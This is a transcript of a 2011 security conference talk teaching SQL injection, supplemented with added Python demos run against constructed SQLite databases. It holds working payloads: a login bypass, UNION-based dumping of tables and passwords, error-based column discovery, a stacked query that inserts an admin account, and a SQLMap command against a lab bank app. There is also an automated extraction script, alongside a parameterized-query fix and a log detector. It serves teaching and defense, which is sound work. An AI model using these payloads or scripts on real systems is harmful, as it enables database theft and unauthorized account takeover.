How did i steal your database CSCamp2011

How did i steal your database CSCamp2011 Presentation Transcript

  • Command-line fragment captured from the SQLMap demo slide (the rest of the command is not in the capture):
    -u "http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001" --cookie "ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false" -p account_no

  • How Did I Steal Your Database
    Mostafa Siraj
    Application Security Expert
  • DISCLAIMER
    Hacking websites is ILLEGAL
    This presentation is meant for educational purposes ONLY
    Only use this stuff on YOUR website and YOUR account
  • Nearly all applications rely on a Datastore
  • What is a Database
    A collection of tables (Users, Orders, Countries, etc.)
    Each table is a collection of columns and rows
  • What is SQL
    A query language that allows interacting with the database
    SQL can
    Retrieve data from the database
    Insert new records in the database
    Delete records from the database
    Update records in the database
  • SQL Queries
    To get all data about the user elprince:
    SELECT Username, Password, First_Name, Last_Name
    FROM Users
    WHERE Username='elprince'
    Gives a result: (result table shown on the slide)
  • FACT
    Amongst Codd's rules for a Relational Database:
    Metadata must be stored in the database just as regular data is
  • SQL Injection
    is a technique where an attacker creates or alters existing SQL commands to:
    Expose hidden data (e.g. steal all the records from the tables)
    Override data (e.g. the administrator's password)
    Execute dangerous system-level commands on the database host
  • SQL Injection Login Example
    SELECT * FROM Users WHERE Username='username' AND Password='password'
    If the user enters Elprince, Elprince123 the query will be
    SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'
  • SQL Injection Example (cont.)
    Suppose the user enters ' OR 1=1--, 123; the query will be
    SELECT * FROM Users WHERE
    Username='' OR 1=1--' AND Password='123'
    -- comments out everything after it, so the query the database actually runs is
    SELECT * FROM Users WHERE
    Username='' OR 1=1
  • This is not enough
    You can enhance the injection to log in with the administrator account
    Most login pages sign in whichever row the query returns first, and an ORDER BY lets you choose that row
    Enter ' OR 1=1 ORDER BY 1--, abc and the query will be
    SELECT * FROM Users WHERE
    Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
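The login bypass above as an added, runnable example (not code from the presentation): a throwaway SQLite database stands in for the deck's target, and the Users rows, column names and the `safe_login` helper are assumptions made for the demo. The vulnerable function concatenates the input exactly as the deck's query does; the second function runs the same lookup with bound parameters, which is the fix. The `--` comment marker behaves in SQLite as it does in MS SQL Server.

```python
import sqlite3

# Constructed sample data (not from the presentation): id 1 is the
# administrator, as it usually is on a real login table.
USERS = [
    (1, "admin", "S3cret!", "Administrator"),
    (2, "elprince", "Elprince123", "Mostafa"),
    (3, "bob", "hunter2", "Bob"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, Username TEXT, "
                "Password TEXT, First_Name TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?, ?, ?)", USERS)
    return con


def vulnerable_login(con, username, password):
    """The deck's query, built by string concatenation: whoever controls the
    input controls the SQL. Like many real login pages it signs in whichever
    row comes back first, which is exactly what the ORDER BY trick exploits."""
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    row = con.execute(sql).fetchone()
    return row[1] if row else None      # the Username we are now logged in as


def safe_login(con, username, password):
    """Same lookup with bound parameters: the values travel separately from
    the statement text, so quotes and comment markers in them are just data."""
    row = con.execute("SELECT * FROM Users WHERE Username=? AND Password=?",
                      (username, password)).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    con = make_db()
    for user, pwd in [("elprince", "Elprince123"),
                      ("' OR 1=1--", "123"),                   # the deck's bypass
                      ("' OR 1=1 ORDER BY 1--", "abc"),         # first row = admin
                      ("' OR 1=1 ORDER BY 1 DESC--", "abc")]:   # pick the last row instead
        print(repr(user), "->", vulnerable_login(con, user, pwd),
              "| parameterized:", safe_login(con, user, pwd))
```

With the concatenated query the tautology logs the attacker in as `admin` (the lowest id), and flipping the ORDER BY direction picks a different victim; the parameterized version returns no row for either payload because the whole string is compared as a username.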
  • Finding SQL Injection Bugs
    Submit a single quotation mark and observe the result
    Submit two single quotation marks and observe the result (two quotes form an escaped quote in SQL, so an error on one quote but not on two means your input reaches the SQL parser)
  • Finding SQL Injection Bugs
    For multi-step processes, complete all the steps before observing the results
    For search fields try using the wildcard character %
  • Finding SQL Injection Bugs
    For numeric data, if the original value was 2 try submitting
    1+1 or 3-1
    If successful try using SQL-specific keywords, e.g.
    67-ASCII('A')  [ASCII('A')=65, so this is 2 as well]
    If single quotes are filtered try
    51-ASCII(1)  [the 1 is implicitly converted to '1' and ASCII('1')=49, so again 2]
  • Identify the database engine
    The error messages will let us know the DB engine
    We can guess the DB based on the OS or web server (e.g. LAMP: Linux+Apache+MySQL+PHP)
  • Identify the database engine
    Use engine-specific characters or commands:
    String concatenation differs between DB engines, so inject a fragment and see which one keeps working
    Oracle: '||'FOO
    MS SQL Server: '+'FOO
    MySQL: ' 'FOO  [note the space between the 2 quotes]
  • Identify user privileges (MS SQL Server syntax)
    ' and 1 in (SELECT user)--  [the conversion error echoes the database user name]
    '; IF user='admin' WAITFOR DELAY '0:0:10'--  [a 10 second delay means we are admin]
  • Injection in Search Fields
  • Entering Normal Input
  • Search Results
  • Trying Single Quote
  • I receive this error
    The error message states that it's MySQL
  • Suppose I still don't know the DB engine. Is it MS SQL Server?
    Note: string concatenation in MS SQL Server is +
  • I'm getting an error, so it's not MS SQL Server
  • Is it Oracle?
    Note: string concatenation in Oracle is ||
  • Different error, still not Oracle
  • Is it MySQL?
    Note: string concatenation in MySQL is a blank space
  • It's MySQL
  • The query in the backend is something like this
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
    A possible location for my input
  • The Strategy
    1. Get the number of items (columns) after the SELECT statement
    How many items are here?
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR …..>……
  • The Strategy
    2. Identify the location of the STRINGS in the SELECT statement
    Which of those are strings?
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR …..>……
  • The Strategy
    3. Get the structure of the database
    SELECT …,…,…,…,…
    FROM ….
    WHERE …. UNION
    SELECT ….,TableNames,….,….,…
    FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • The Strategy
    4. Get the data from the database
    SELECT …,…,…,…,…
    FROM ….
    WHERE …. UNION
    SELECT ….,Usernames,….,….,…
    FROM Users --=…. AND ….!=….. OR …..>……
  • The Strategy
    1. Get the number of items after the SELECT statement
    2. Identify the location of the STRINGS in the SELECT statement
    3. Get the structure of the database
    4. Get the data from the database
  • 1. Get the number of items after the SELECT statement
  • Error
  • Try another number
  • Result
    Why are there fewer results?
  • Try another number
  • Error, so it's not 8
  • Let's try 7
  • Result
    How many columns do we have in the SELECT statement? (7, as the next payload shows)
  • 2. Identify the location of the STRINGS in the SELECT Statement
    1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • Result
  • Get the Strings and the locations
    1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • Result
  • 3. Get the Structure of the database
    1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
  • Result
  • Next Queries
    1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'#
    1234') UNION SELECT
    NULL,NULL,NULL,username,password,NULL,NULL
    FROM users
    WHERE id<100#
    …….
    Continue till you get all the tables
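The four-step UNION strategy (count the columns, find the positions that are rendered back to you, read the metadata, dump the table) as one added, self-contained script; it is not the presentation's code. It runs against a constructed SQLite catalogue search (the Products and Users tables, the `search` function and the `MARK` marker strings are assumptions for this demo). SQLite's `sqlite_master` stands in for MySQL's `information_schema.tables`, its comment marker is `--` rather than the `#` used in the deck, and on a real target `probe` would be an HTTP request whose error page you inspect instead of the `sqlite3.Error` caught here.

```python
import sqlite3

# Constructed demo application (not the presentation's target): a product
# search that selects seven columns but renders only four of them, plus the
# Users table the attacker is after. Names and rows are assumptions.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Products (id INTEGER, name TEXT, vendor TEXT, category TEXT,
                               description TEXT, price REAL, stock INTEGER);
        INSERT INTO Products VALUES (1, 'Router X1', 'Acme', 'network', 'Small office router', 99.0, 5);
        INSERT INTO Products VALUES (2, 'Switch S8', 'Acme', 'network', '8 port switch', 49.5, 12);
        CREATE TABLE Users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO Users VALUES (1, 'admin', 'S3cret!');
        INSERT INTO Users VALUES (2, 'elprince', 'Elprince123');
    """)
    return con


def search(con, term):
    """Vulnerable search. The term lands inside a LIKE pattern that sits inside
    parentheses, which is why the payloads start with ') to close both.
    Only name, vendor, category and description are rendered to the page."""
    sql = ("SELECT id, name, vendor, category, description, price, stock "
           "FROM Products WHERE (name LIKE '%" + term + "%')")
    return [(r[1], r[2], r[3], r[4]) for r in con.execute(sql).fetchall()]


COMMENT = "--"   # SQLite/MS SQL comment marker; the deck's MySQL target uses #


def find_column_count(probe, max_cols=20):
    """Step 1: grow UNION SELECT NULL,... until the engine stops complaining
    that the two SELECTs have different numbers of columns."""
    for n in range(1, max_cols + 1):
        try:
            probe("1234') UNION SELECT " + ",".join(["NULL"] * n) + COMMENT)
            return n
        except sqlite3.Error:
            continue
    return None


def find_visible_positions(probe, ncols):
    """Step 2: put a marker string in one position at a time and record the
    positions that come back in the rendered result. On a strictly typed
    engine (MS SQL, Oracle) a position that raises a conversion error is not
    a string column and cannot carry text at all."""
    visible = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = "'MARK%d'" % i
        try:
            rows = probe("1234') UNION SELECT " + ",".join(cols) + COMMENT)
        except sqlite3.Error:
            continue
        if any("MARK%d" % i == cell for row in rows for cell in row):
            visible.append(i + 1)          # 1-based, as in the deck
    return visible


def extract(probe, ncols, columns, from_clause):
    """Steps 3 and 4: UNION our own SELECT into the visible positions.
    `columns` maps a 1-based visible position to the expression to read."""
    cols = ["NULL"] * ncols
    for pos, expr in columns.items():
        cols[pos - 1] = expr
    rows = probe("1234') UNION SELECT " + ",".join(cols) +
                 " FROM " + from_clause + COMMENT)
    return sorted(tuple(c for c in row if c is not None) for row in rows)


def run_attack(con):
    """Drive the four steps against the vulnerable search and return what
    each one learned."""
    probe = lambda term: search(con, term)
    ncols = find_column_count(probe)
    visible = find_visible_positions(probe, ncols)
    # Step 3: table names from the catalogue (sqlite_master here,
    # information_schema.tables on MySQL).
    tables = extract(probe, ncols, {visible[0]: "name"},
                     "sqlite_master WHERE type='table'")
    # Step 4: two columns at once, one per visible position.
    creds = extract(probe, ncols,
                    {visible[0]: "username", visible[1]: "password"}, "Users")
    return ncols, visible, tables, creds


if __name__ == "__main__":
    print(run_attack(make_db()))
```

The column count comes out as 7 and the marker shows up in positions 2 to 5, so those are the slots used to carry table names and then usernames and passwords out through the search results page.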
  • Injection with errors
  • Gives me an error
  • Getting the version
    ' and 1 in (SELECT @@version)--  [MS SQL Server: the conversion error echoes the version string]
  • Gives me this error
  • Getting column names
  • I get this error
  • Getting the next column name
    ' group by login.firstname having 1=1--
  • I get this error
  • Again
    ' group by login.firstname, login.surname having 1=1--
  • The error reveals a new column name
  • Again
    ' group by login.firstname, login.surname, login.username having 1=1--
  • New column name
  • Continue…
    After getting all of the columns I found a field called IsAdmin - that's my goal
    Submitting the following (a second statement stacked after the original one with ;) creates an admin account on the application
    '; INSERT INTO Login
    (username,pwd,IsAdmin,……)
    VALUES
    ('Administrator','******',TRUE,…..)
  • Not all Injections generate errors
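Turning the page around: the payloads used in this deck (UNION SELECT, @@version, GROUP BY ... HAVING 1=1, WAITFOR DELAY, stacked ; statements) are loud in web server logs even when the application shows no error at all. Added example, not part of the presentation: a small detector over constructed common-log-format lines (the IPs, paths and timestamps are invented) that URL-decodes each query string and matches the deck's patterns. A lone apostrophe, as in O'Brien, is deliberately not flagged.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the presentation), common log format,
# carrying the deck's payloads URL-encoded the way a browser submits a form.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2011:10:01:02 +0200] "GET /search.aspx?q=router HTTP/1.1" 200 5120
10.0.0.9 - - [12/Nov/2011:10:01:09 +0200] "GET /search.aspx?q=1234%27%29+UNION+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 4800
10.0.0.9 - - [12/Nov/2011:10:02:31 +0200] "GET /login.aspx?user=%27+and+1+in+%28SELECT+%40%40version%29-- HTTP/1.1" 500 612
10.0.0.9 - - [12/Nov/2011:10:03:05 +0200] "GET /login.aspx?user=%27+group+by+login.firstname%2C+login.surname+having+1%3D1-- HTTP/1.1" 500 640
10.0.0.9 - - [12/Nov/2011:10:04:44 +0200] "GET /login.aspx?user=%27%3B+IF+user%3D%27admin%27+WAITFOR+DELAY+%270%3A0%3A10%27-- HTTP/1.1" 200 300
10.0.0.7 - - [12/Nov/2011:10:05:00 +0200] "GET /search.aspx?q=O%27Brien HTTP/1.1" 200 5100
"""

# Each rule is (name, regex) and runs over the decoded, lower-cased query string.
RULES = [
    ("union_select",   re.compile(r"union\s+(all\s+)?select\b")),
    ("groupby_having", re.compile(r"group\s+by\s+[\w.]+(\s*,\s*[\w.]+)*\s+having\b")),
    ("version_probe",  re.compile(r"@@version|\bversion\(\)")),
    ("time_delay",     re.compile(r"waitfor\s+delay|\bsleep\s*\(|pg_sleep")),
    ("tautology",      re.compile(r"'\s*or\s+1\s*=\s*1")),
    ("stacked_query",  re.compile(r";\s*(if|insert|update|delete|drop|exec)\b")),
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')


def decode_query(url):
    """Return the decoded, lower-cased query string. Decoding twice catches
    double-encoded payloads that slip past filters looking at the raw URL."""
    query = url.split("?", 1)[1] if "?" in url else ""
    return unquote_plus(unquote_plus(query)).lower()


def scan_log(text):
    """Return (ip, url, [rule names]) for every request whose decoded query
    string matches at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("url"))
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((m.group("ip"), m.group("url"), matched))
    return hits


if __name__ == "__main__":
    for ip, url, rules in scan_log(SAMPLE_LOG):
        print(ip, ",".join(rules), url)
```

Four of the six lines are flagged and all come from one client, which is the pivot a responder wants: one source, a column-count probe followed by a version probe, error-based column enumeration and a timing check, the exact progression the deck walks through.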
  • DEMO: SQLMap
  • You were a GREAT audience
  • Thank You
    @mostafasiraj
    Mostafa Siraj